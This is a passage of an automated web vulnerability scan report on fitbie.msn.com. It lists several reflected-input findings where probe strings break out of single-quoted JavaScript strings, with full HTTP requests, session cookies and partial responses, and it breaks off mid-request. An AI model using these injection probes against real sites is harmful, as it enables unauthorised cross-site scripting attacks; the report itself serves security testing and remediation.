<a href="/flag/flag/favorites/4411c3e29';ac45156e9a?destination=node%2F4411c3e29';ac45156e9a&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.29. http://fitbie.msn.com/search/bing [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /search/bing

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb832'%3bf3e4d4f7a7d was submitted in the REST URL parameter 2. This input was echoed as cb832';f3e4d4f7a7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/bingcb832'%3bf3e4d4f7a7d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:14 +0000
ETag: "1297607834-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:37:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:37:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/bingcb832';f3e4d4f7a7d?destination=node%2Fbingcb832';f3e4d4f7a7d&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.30. http://fitbie.msn.com/sites/all/modules/addtoany/addtoany.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/addtoany/addtoany.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67a9'%3b056c24d53e8 was submitted in the REST URL parameter 2. This input was echoed as b67a9';056c24d53e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allb67a9'%3b056c24d53e8/modules/addtoany/addtoany.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/taxonomy/term/117
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:42 +0000
ETag: "1297607742-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:42 GMT
Date: Sun, 13 Feb 2011 14:35:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allb67a9';056c24d53e8?destination=node%2Fallb67a9';056c24d53e8&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.31. http://fitbie.msn.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8c81'%3b3622d6c4815 was submitted in the REST URL parameter 2. This input was echoed as d8c81';3622d6c4815 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alld8c81'%3b3622d6c4815/modules/cck/modules/fieldgroup/fieldgroup.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld8c81';3622d6c4815?destination=node%2Falld8c81';3622d6c4815&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.32. http://fitbie.msn.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ba89'%3b90d79f7a70 was submitted in the REST URL parameter 2. This input was echoed as 2ba89';90d79f7a70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all2ba89'%3b90d79f7a70/modules/cck/theme/content-module.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all2ba89';90d79f7a70?destination=node%2Fall2ba89';90d79f7a70&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.33. http://fitbie.msn.com/sites/all/modules/ctools/css/ctools.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/ctools/css/ctools.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a775'%3bddfb1ea9cd2 was submitted in the REST URL parameter 2. This input was echoed as 6a775';ddfb1ea9cd2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all6a775'%3bddfb1ea9cd2/modules/ctools/css/ctools.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:11 +0000
ETag: "1297606691-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all6a775';ddfb1ea9cd2?destination=node%2Fall6a775';ddfb1ea9cd2&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.34. http://fitbie.msn.com/sites/all/modules/date/date.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d41d'%3b6155fbf6306 was submitted in the REST URL parameter 2. This input was echoed as 4d41d';6155fbf6306 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all4d41d'%3b6155fbf6306/modules/date/date.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:18:13 GMT
Date: Sun, 13 Feb 2011 14:18:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all4d41d';6155fbf6306?destination=node%2Fall4d41d';6155fbf6306&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.35. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7781d'%3ba9f35523aa7 was submitted in the REST URL parameter 2. This input was echoed as 7781d';a9f35523aa7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all7781d'%3ba9f35523aa7/modules/fbconnect/fbconnect.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:07 +0000
ETag: "1297606687-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:08 GMT
Date: Sun, 13 Feb 2011 14:18:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7781d';a9f35523aa7?destination=node%2Fall7781d';a9f35523aa7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.36. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52335'%3b81d81a358d7 was submitted in the REST URL parameter 2. This input was echoed as 52335';81d81a358d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all52335'%3b81d81a358d7/modules/fbconnect/fbconnect.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:13 GMT
Date: Sun, 13 Feb 2011 14:18:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all52335';81d81a358d7?destination=node%2Fall52335';81d81a358d7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.37. http://fitbie.msn.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60dc5'%3ba8f47750afe was submitted in the REST URL parameter 2. This input was echoed as 60dc5';a8f47750afe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all60dc5'%3ba8f47750afe/modules/filefield/filefield.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:06 +0000
ETag: "1297606686-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all60dc5';a8f47750afe?destination=node%2Fall60dc5';a8f47750afe&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.38. http://fitbie.msn.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 996e5'%3b67a6405b09d was submitted in the REST URL parameter 2. This input was echoed as 996e5';67a6405b09d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all996e5'%3b67a6405b09d/modules/jquery_update/replace/jquery.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
